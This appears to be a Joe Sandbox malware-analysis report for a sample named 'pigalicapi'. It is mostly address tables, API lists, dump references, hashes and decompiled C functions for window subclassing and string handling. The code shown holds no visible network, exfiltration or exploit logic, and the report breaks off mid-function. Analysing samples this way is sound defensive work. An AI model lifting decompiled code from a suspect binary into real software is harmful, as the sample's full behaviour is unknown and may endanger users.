                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080b265
                                                                                                                                                                                                                                                                                          0x0080b258
                                                                                                                                                                                                                                                                                          0x0080b22c
                                                                                                                                                                                                                                                                                          0x0080b221
                                                                                                                                                                                                                                                                                          0x0080b1d8
                                                                                                                                                                                                                                                                                          0x0080b1d8
                                                                                                                                                                                                                                                                                          0x0080b1d8
                                                                                                                                                                                                                                                                                          0x0080b1e0
                                                                                                                                                                                                                                                                                          0x0080b1e0
                                                                                                                                                                                                                                                                                          0x0080b1e2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080b1e8
                                                                                                                                                                                                                                                                                          0x0080b1eb
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080b1f1
                                                                                                                                                                                                                                                                                          0x0080b1fd
                                                                                                                                                                                                                                                                                          0x0080b203
                                                                                                                                                                                                                                                                                          0x0080b205
                                                                                                                                                                                                                                                                                          0x0080b26c
                                                                                                                                                                                                                                                                                          0x0080b26f
                                                                                                                                                                                                                                                                                          0x0080b271
                                                                                                                                                                                                                                                                                          0x0080b276
                                                                                                                                                                                                                                                                                          0x0080b278
                                                                                                                                                                                                                                                                                          0x0080b291
                                                                                                                                                                                                                                                                                          0x0080b29c
                                                                                                                                                                                                                                                                                          0x0080b2a1
                                                                                                                                                                                                                                                                                          0x0080b2a1
                                                                                                                                                                                                                                                                                          0x0080b2a4
                                                                                                                                                                                                                                                                                          0x0080b2a4
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080b207
                                                                                                                                                                                                                                                                                          0x0080b207
                                                                                                                                                                                                                                                                                          0x0080b208
                                                                                                                                                                                                                                                                                          0x0080b20e
                                                                                                                                                                                                                                                                                          0x0080b211
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080b211
                                                                                                                                                                                                                                                                                          0x0080b205
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080b1eb
                                                                                                                                                                                                                                                                                          0x0080b2b7
                                                                                                                                                                                                                                                                                          0x0080b2bd
                                                                                                                                                                                                                                                                                          0x0080b2bd
                                                                                                                                                                                                                                                                                          0x0080b2c2
                                                                                                                                                                                                                                                                                          0x0080b2c7
                                                                                                                                                                                                                                                                                          0x0080b2c7
                                                                                                                                                                                                                                                                                          0x0080b2cc
                                                                                                                                                                                                                                                                                          0x0080b2d1
                                                                                                                                                                                                                                                                                          0x0080b2d1
                                                                                                                                                                                                                                                                                          0x0080b2d1
                                                                                                                                                                                                                                                                                          0x0080b2d1
                                                                                                                                                                                                                                                                                          0x0080b2d4
                                                                                                                                                                                                                                                                                          0x0080b2d4
                                                                                                                                                                                                                                                                                          0x0080b2d7
                                                                                                                                                                                                                                                                                          0x0080b2da
                                                                                                                                                                                                                                                                                          0x0080b2dc
                                                                                                                                                                                                                                                                                          0x0080b344
                                                                                                                                                                                                                                                                                          0x0080b34d
                                                                                                                                                                                                                                                                                          0x0080b34d
                                                                                                                                                                                                                                                                                          0x0080b34f
                                                                                                                                                                                                                                                                                          0x0080b356
                                                                                                                                                                                                                                                                                          0x0080b35c
                                                                                                                                                                                                                                                                                          0x0080b35c
                                                                                                                                                                                                                                                                                          0x0080b35c
                                                                                                                                                                                                                                                                                          0x0080b35e
                                                                                                                                                                                                                                                                                          0x0080b363
                                                                                                                                                                                                                                                                                          0x0080b36c
                                                                                                                                                                                                                                                                                          0x0080b377
                                                                                                                                                                                                                                                                                          0x0080b2de
                                                                                                                                                                                                                                                                                          0x0080b2de
                                                                                                                                                                                                                                                                                          0x0080b2e6
                                                                                                                                                                                                                                                                                          0x0080b2e8
                                                                                                                                                                                                                                                                                          0x0080b2f4
                                                                                                                                                                                                                                                                                          0x0080b2fa
                                                                                                                                                                                                                                                                                          0x0080b2fc
                                                                                                                                                                                                                                                                                          0x0080b2fe
                                                                                                                                                                                                                                                                                          0x0080b2fe
                                                                                                                                                                                                                                                                                          0x0080b303
                                                                                                                                                                                                                                                                                          0x0080b303
                                                                                                                                                                                                                                                                                          0x0080b2fc
                                                                                                                                                                                                                                                                                          0x0080b308
                                                                                                                                                                                                                                                                                          0x0080b30a
                                                                                                                                                                                                                                                                                          0x0080b311
                                                                                                                                                                                                                                                                                          0x0080b314
                                                                                                                                                                                                                                                                                          0x0080b316
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080b31c
                                                                                                                                                                                                                                                                                          0x0080b31c
                                                                                                                                                                                                                                                                                          0x0080b322
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080b322
                                                                                                                                                                                                                                                                                          0x0080b30c
                                                                                                                                                                                                                                                                                          0x0080b30c
                                                                                                                                                                                                                                                                                          0x0080b30c
                                                                                                                                                                                                                                                                                          0x0080b328
                                                                                                                                                                                                                                                                                          0x0080b32f
                                                                                                                                                                                                                                                                                          0x0080b334
                                                                                                                                                                                                                                                                                          0x0080b337
                                                                                                                                                                                                                                                                                          0x0080b339
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080b33f
                                                                                                                                                                                                                                                                                          0x0080b33f
                                                                                                                                                                                                                                                                                          0x0080b342
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080b342
                                                                                                                                                                                                                                                                                          0x0080b339
                                                                                                                                                                                                                                                                                          0x0080b30a
                                                                                                                                                                                                                                                                                          0x0080b2dc
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080b1bd
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0080B198
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0080B1A9
                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000001), ref: 0080B1B5
                                                                                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000000,?), ref: 0080B1FD
                                                                                                                                                                                                                                                                                          • _memmove_s.LIBCMT ref: 0080B24D
                                                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 0080B2B7
                                                                                                                                                                                                                                                                                          • __recalloc.LIBCMT ref: 0080B32F
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrlen$ExceptionRaise__recalloc_memmove_slstrcmpilstrcpyn
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 959487417-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 9ad21e64f79bc2c8632bb0867ace82e3e336cf0aade9f7098c9ebd9ae27ccebf
                                                                                                                                                                                                                                                                                          • Instruction ID: 423162201cf52711b2edff8380a28a284ddf70eea61a14d289da7b5770d5d11a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ad21e64f79bc2c8632bb0867ace82e3e336cf0aade9f7098c9ebd9ae27ccebf
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8751BE72A011249BDB64EF14CD85BE9B7A9FF44300F1681A5EE09EF285D770AD818BE1
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 66%
                                                                                                                                                                                                                                                                                          			E008141D0(long _a4, long _a8, int _a12, long _a16) {
                                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                                          				long _v28;
                                                                                                                                                                                                                                                                                          				int _v32;
                                                                                                                                                                                                                                                                                          				long _v36;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v40;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t51;
                                                                                                                                                                                                                                                                                          				signed int _t53;
                                                                                                                                                                                                                                                                                          				int _t59;
                                                                                                                                                                                                                                                                                          				long _t63;
                                                                                                                                                                                                                                                                                          				long _t65;
                                                                                                                                                                                                                                                                                          				long _t70;
                                                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t79;
                                                                                                                                                                                                                                                                                          				int _t89;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t90;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t70 = _a16;
                                                                                                                                                                                                                                                                                          				_t90 = _a4;
                                                                                                                                                                                                                                                                                          				_t51 =  *(_t90 + 4);
                                                                                                                                                                                                                                                                                          				_t89 = _a12;
                                                                                                                                                                                                                                                                                          				_v36 = _a8;
                                                                                                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                                                                                          				_a4 = 0;
                                                                                                                                                                                                                                                                                          				_push( &_a4);
                                                                                                                                                                                                                                                                                          				_a12 =  *(_t90 + 0x18);
                                                                                                                                                                                                                                                                                          				_push(_t70);
                                                                                                                                                                                                                                                                                          				_push(_t89);
                                                                                                                                                                                                                                                                                          				 *(_t90 + 0x18) =  &_v40;
                                                                                                                                                                                                                                                                                          				_push(_a8);
                                                                                                                                                                                                                                                                                          				_push(_t51);
                                                                                                                                                                                                                                                                                          				_v12 = 0x24;
                                                                                                                                                                                                                                                                                          				_v8 = 1;
                                                                                                                                                                                                                                                                                          				_v40 = _t51;
                                                                                                                                                                                                                                                                                          				_v32 = _t89;
                                                                                                                                                                                                                                                                                          				_v28 = _t70;
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)( *((intOrPtr*)( *_t90))))() == 0) {
                                                                                                                                                                                                                                                                                          					_t59 = _a8;
                                                                                                                                                                                                                                                                                          					if(_t59 == 0x82) {
                                                                                                                                                                                                                                                                                          						_a8 = GetWindowLongA( *(_t90 + 4), 0xfffffffc);
                                                                                                                                                                                                                                                                                          						_t63 = CallWindowProcA( *(_t90 + 0x20),  *(_t90 + 4), 0x82, _t89, _t70);
                                                                                                                                                                                                                                                                                          						_t79 =  *(_t90 + 0x20);
                                                                                                                                                                                                                                                                                          						_a4 = _t63;
                                                                                                                                                                                                                                                                                          						__eflags = _t79 - __imp__DefWindowProcA; // 0x778fd1c0
                                                                                                                                                                                                                                                                                          						if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          							_t65 = GetWindowLongA( *(_t90 + 4), 0xfffffffc);
                                                                                                                                                                                                                                                                                          							__eflags = _t65 - _a8;
                                                                                                                                                                                                                                                                                          							if(_t65 == _a8) {
                                                                                                                                                                                                                                                                                          								SetWindowLongA( *(_t90 + 4), 0xfffffffc,  *(_t90 + 0x20));
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t36 = _t90 + 0x1c;
                                                                                                                                                                                                                                                                                          						 *_t36 =  *(_t90 + 0x1c) | 0x00000001;
                                                                                                                                                                                                                                                                                          						__eflags =  *_t36;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_a4 = CallWindowProcA( *(_t90 + 0x20),  *(_t90 + 4), _t59, _t89, _t70);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t53 =  *(_t90 + 0x1c);
                                                                                                                                                                                                                                                                                          				if((_t53 & 0x00000001) == 0 || _a12 != 0) {
                                                                                                                                                                                                                                                                                          					 *(_t90 + 0x18) = _a12;
                                                                                                                                                                                                                                                                                          					return _a4;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					 *(_t90 + 4) = 0;
                                                                                                                                                                                                                                                                                          					 *(_t90 + 0x18) = 0;
                                                                                                                                                                                                                                                                                          					 *(_t90 + 0x1c) = _t53 & 0xfffffffe;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)( *((intOrPtr*)( *_t90 + 0xc))))( *(_t90 + 4));
                                                                                                                                                                                                                                                                                          					return _a4;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}





















                                                                                                                                                                                                                                                                                          0x008141da
                                                                                                                                                                                                                                                                                          0x008141de
                                                                                                                                                                                                                                                                                          0x008141e4
                                                                                                                                                                                                                                                                                          0x008141e8
                                                                                                                                                                                                                                                                                          0x008141eb
                                                                                                                                                                                                                                                                                          0x008141f0
                                                                                                                                                                                                                                                                                          0x008141f1
                                                                                                                                                                                                                                                                                          0x008141f4
                                                                                                                                                                                                                                                                                          0x008141f7
                                                                                                                                                                                                                                                                                          0x008141fa
                                                                                                                                                                                                                                                                                          0x00814200
                                                                                                                                                                                                                                                                                          0x00814204
                                                                                                                                                                                                                                                                                          0x00814207
                                                                                                                                                                                                                                                                                          0x0081420b
                                                                                                                                                                                                                                                                                          0x0081420c
                                                                                                                                                                                                                                                                                          0x00814213
                                                                                                                                                                                                                                                                                          0x00814214
                                                                                                                                                                                                                                                                                          0x00814217
                                                                                                                                                                                                                                                                                          0x0081421e
                                                                                                                                                                                                                                                                                          0x00814225
                                                                                                                                                                                                                                                                                          0x00814228
                                                                                                                                                                                                                                                                                          0x0081422b
                                                                                                                                                                                                                                                                                          0x00814232
                                                                                                                                                                                                                                                                                          0x00814234
                                                                                                                                                                                                                                                                                          0x0081423c
                                                                                                                                                                                                                                                                                          0x0081426a
                                                                                                                                                                                                                                                                                          0x00814272
                                                                                                                                                                                                                                                                                          0x00814278
                                                                                                                                                                                                                                                                                          0x0081427b
                                                                                                                                                                                                                                                                                          0x0081427e
                                                                                                                                                                                                                                                                                          0x00814284
                                                                                                                                                                                                                                                                                          0x0081428c
                                                                                                                                                                                                                                                                                          0x00814292
                                                                                                                                                                                                                                                                                          0x00814295
                                                                                                                                                                                                                                                                                          0x008142a1
                                                                                                                                                                                                                                                                                          0x008142a1
                                                                                                                                                                                                                                                                                          0x00814295
                                                                                                                                                                                                                                                                                          0x008142a7
                                                                                                                                                                                                                                                                                          0x008142a7
                                                                                                                                                                                                                                                                                          0x008142a7
                                                                                                                                                                                                                                                                                          0x0081423e
                                                                                                                                                                                                                                                                                          0x0081424f
                                                                                                                                                                                                                                                                                          0x0081424f
                                                                                                                                                                                                                                                                                          0x0081423c
                                                                                                                                                                                                                                                                                          0x008142ab
                                                                                                                                                                                                                                                                                          0x008142b0
                                                                                                                                                                                                                                                                                          0x008142e5
                                                                                                                                                                                                                                                                                          0x008142ed
                                                                                                                                                                                                                                                                                          0x008142b9
                                                                                                                                                                                                                                                                                          0x008142bf
                                                                                                                                                                                                                                                                                          0x008142c2
                                                                                                                                                                                                                                                                                          0x008142c7
                                                                                                                                                                                                                                                                                          0x008142d0
                                                                                                                                                                                                                                                                                          0x008142db
                                                                                                                                                                                                                                                                                          0x008142db

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Window$Long$CallProc
                                                                                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                                                                                          • API String ID: 513923721-3993045852
                                                                                                                                                                                                                                                                                          • Opcode ID: a2d87785311b86412c84403d655532d3e217b22e2b54968bf5767e1bf2b89247
                                                                                                                                                                                                                                                                                          • Instruction ID: 5c96ac132ac89f6cbc5fee75b4d1d3c90585b732517f7a2145919c10e56c8fc0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2d87785311b86412c84403d655532d3e217b22e2b54968bf5767e1bf2b89247
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F41D875600609AFCB24CF59D88499AB7F9FF88310B10861DF95AC7651D770E941CF90
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 66%
                                                                                                                                                                                                                                                                                          			E008143F0(long _a4, long _a8, int _a12, long _a16) {
                                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                                          				long _v28;
                                                                                                                                                                                                                                                                                          				int _v32;
                                                                                                                                                                                                                                                                                          				long _v36;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v40;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t51;
                                                                                                                                                                                                                                                                                          				signed int _t53;
                                                                                                                                                                                                                                                                                          				int _t59;
                                                                                                                                                                                                                                                                                          				long _t63;
                                                                                                                                                                                                                                                                                          				long _t65;
                                                                                                                                                                                                                                                                                          				long _t70;
                                                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t79;
                                                                                                                                                                                                                                                                                          				int _t89;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t90;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t70 = _a16;
                                                                                                                                                                                                                                                                                          				_t90 = _a4;
                                                                                                                                                                                                                                                                                          				_t51 =  *(_t90 + 4);
                                                                                                                                                                                                                                                                                          				_t89 = _a12;
                                                                                                                                                                                                                                                                                          				_v36 = _a8;
                                                                                                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                                                                                          				_a4 = 0;
                                                                                                                                                                                                                                                                                          				_push( &_a4);
                                                                                                                                                                                                                                                                                          				_a12 =  *(_t90 + 0x38);
                                                                                                                                                                                                                                                                                          				_push(_t70);
                                                                                                                                                                                                                                                                                          				_push(_t89);
                                                                                                                                                                                                                                                                                          				 *(_t90 + 0x38) =  &_v40;
                                                                                                                                                                                                                                                                                          				_push(_a8);
                                                                                                                                                                                                                                                                                          				_push(_t51);
                                                                                                                                                                                                                                                                                          				_v12 = 0x24;
                                                                                                                                                                                                                                                                                          				_v8 = 1;
                                                                                                                                                                                                                                                                                          				_v40 = _t51;
                                                                                                                                                                                                                                                                                          				_v32 = _t89;
                                                                                                                                                                                                                                                                                          				_v28 = _t70;
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)( *((intOrPtr*)( *_t90))))() == 0) {
                                                                                                                                                                                                                                                                                          					_t59 = _a8;
                                                                                                                                                                                                                                                                                          					if(_t59 == 0x82) {
                                                                                                                                                                                                                                                                                          						_a8 = GetWindowLongA( *(_t90 + 4), 0xfffffffc);
                                                                                                                                                                                                                                                                                          						_t63 = CallWindowProcA( *(_t90 + 0x40),  *(_t90 + 4), 0x82, _t89, _t70);
                                                                                                                                                                                                                                                                                          						_t79 =  *(_t90 + 0x40);
                                                                                                                                                                                                                                                                                          						_a4 = _t63;
                                                                                                                                                                                                                                                                                          						__eflags = _t79 - __imp__DefWindowProcA; // 0x778fd1c0
                                                                                                                                                                                                                                                                                          						if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          							_t65 = GetWindowLongA( *(_t90 + 4), 0xfffffffc);
                                                                                                                                                                                                                                                                                          							__eflags = _t65 - _a8;
                                                                                                                                                                                                                                                                                          							if(_t65 == _a8) {
                                                                                                                                                                                                                                                                                          								SetWindowLongA( *(_t90 + 4), 0xfffffffc,  *(_t90 + 0x40));
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t36 = _t90 + 0x3c;
                                                                                                                                                                                                                                                                                          						 *_t36 =  *(_t90 + 0x3c) | 0x00000001;
                                                                                                                                                                                                                                                                                          						__eflags =  *_t36;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_a4 = CallWindowProcA( *(_t90 + 0x40),  *(_t90 + 4), _t59, _t89, _t70);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t53 =  *(_t90 + 0x3c);
                                                                                                                                                                                                                                                                                          				if((_t53 & 0x00000001) == 0 || _a12 != 0) {
                                                                                                                                                                                                                                                                                          					 *(_t90 + 0x38) = _a12;
                                                                                                                                                                                                                                                                                          					return _a4;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					 *(_t90 + 4) = 0;
                                                                                                                                                                                                                                                                                          					 *(_t90 + 0x38) = 0;
                                                                                                                                                                                                                                                                                          					 *(_t90 + 0x3c) = _t53 & 0xfffffffe;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)( *((intOrPtr*)( *_t90 + 0xc))))( *(_t90 + 4));
                                                                                                                                                                                                                                                                                          					return _a4;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}





















                                                                                                                                                                                                                                                                                          0x008143fa
                                                                                                                                                                                                                                                                                          0x008143fe
                                                                                                                                                                                                                                                                                          0x00814404
                                                                                                                                                                                                                                                                                          0x00814408
                                                                                                                                                                                                                                                                                          0x0081440b
                                                                                                                                                                                                                                                                                          0x00814410
                                                                                                                                                                                                                                                                                          0x00814411
                                                                                                                                                                                                                                                                                          0x00814414
                                                                                                                                                                                                                                                                                          0x00814417
                                                                                                                                                                                                                                                                                          0x0081441a
                                                                                                                                                                                                                                                                                          0x00814420
                                                                                                                                                                                                                                                                                          0x00814424
                                                                                                                                                                                                                                                                                          0x00814427
                                                                                                                                                                                                                                                                                          0x0081442b
                                                                                                                                                                                                                                                                                          0x0081442c
                                                                                                                                                                                                                                                                                          0x00814433
                                                                                                                                                                                                                                                                                          0x00814434
                                                                                                                                                                                                                                                                                          0x00814437
                                                                                                                                                                                                                                                                                          0x0081443e
                                                                                                                                                                                                                                                                                          0x00814445
                                                                                                                                                                                                                                                                                          0x00814448
                                                                                                                                                                                                                                                                                          0x0081444b
                                                                                                                                                                                                                                                                                          0x00814452
                                                                                                                                                                                                                                                                                          0x00814454
                                                                                                                                                                                                                                                                                          0x0081445c
                                                                                                                                                                                                                                                                                          0x0081448a
                                                                                                                                                                                                                                                                                          0x00814492
                                                                                                                                                                                                                                                                                          0x00814498
                                                                                                                                                                                                                                                                                          0x0081449b
                                                                                                                                                                                                                                                                                          0x0081449e
                                                                                                                                                                                                                                                                                          0x008144a4
                                                                                                                                                                                                                                                                                          0x008144ac
                                                                                                                                                                                                                                                                                          0x008144b2
                                                                                                                                                                                                                                                                                          0x008144b5
                                                                                                                                                                                                                                                                                          0x008144c1
                                                                                                                                                                                                                                                                                          0x008144c1
                                                                                                                                                                                                                                                                                          0x008144b5
                                                                                                                                                                                                                                                                                          0x008144c7
                                                                                                                                                                                                                                                                                          0x008144c7
                                                                                                                                                                                                                                                                                          0x008144c7
                                                                                                                                                                                                                                                                                          0x0081445e
                                                                                                                                                                                                                                                                                          0x0081446f
                                                                                                                                                                                                                                                                                          0x0081446f
                                                                                                                                                                                                                                                                                          0x0081445c
                                                                                                                                                                                                                                                                                          0x008144cb
                                                                                                                                                                                                                                                                                          0x008144d0
                                                                                                                                                                                                                                                                                          0x00814505
                                                                                                                                                                                                                                                                                          0x0081450d
                                                                                                                                                                                                                                                                                          0x008144d9
                                                                                                                                                                                                                                                                                          0x008144df
                                                                                                                                                                                                                                                                                          0x008144e2
                                                                                                                                                                                                                                                                                          0x008144e7
                                                                                                                                                                                                                                                                                          0x008144f0
                                                                                                                                                                                                                                                                                          0x008144fb
                                                                                                                                                                                                                                                                                          0x008144fb

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Window$Long$CallProc
                                                                                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                                                                                          • API String ID: 513923721-3993045852
                                                                                                                                                                                                                                                                                          • Opcode ID: d6d5c8a24d2db9e9283104d6a3fb89f262acb12831527f5ada9b58f797d0849d
                                                                                                                                                                                                                                                                                          • Instruction ID: bd93e4e201006feab617f377d2651390572511fe2f9aa69a7e10d0ed4869d206
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6d5c8a24d2db9e9283104d6a3fb89f262acb12831527f5ada9b58f797d0849d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6941E9B5600604AFCB24CF59D8849AABBF8FF88320B10CA1DE95AC7750D771E941CF54
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                                                                                                                          			E00808AB0(void* __ebx) {
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				long _t27;
                                                                                                                                                                                                                                                                                          				void* _t64;
                                                                                                                                                                                                                                                                                          				void* _t83;
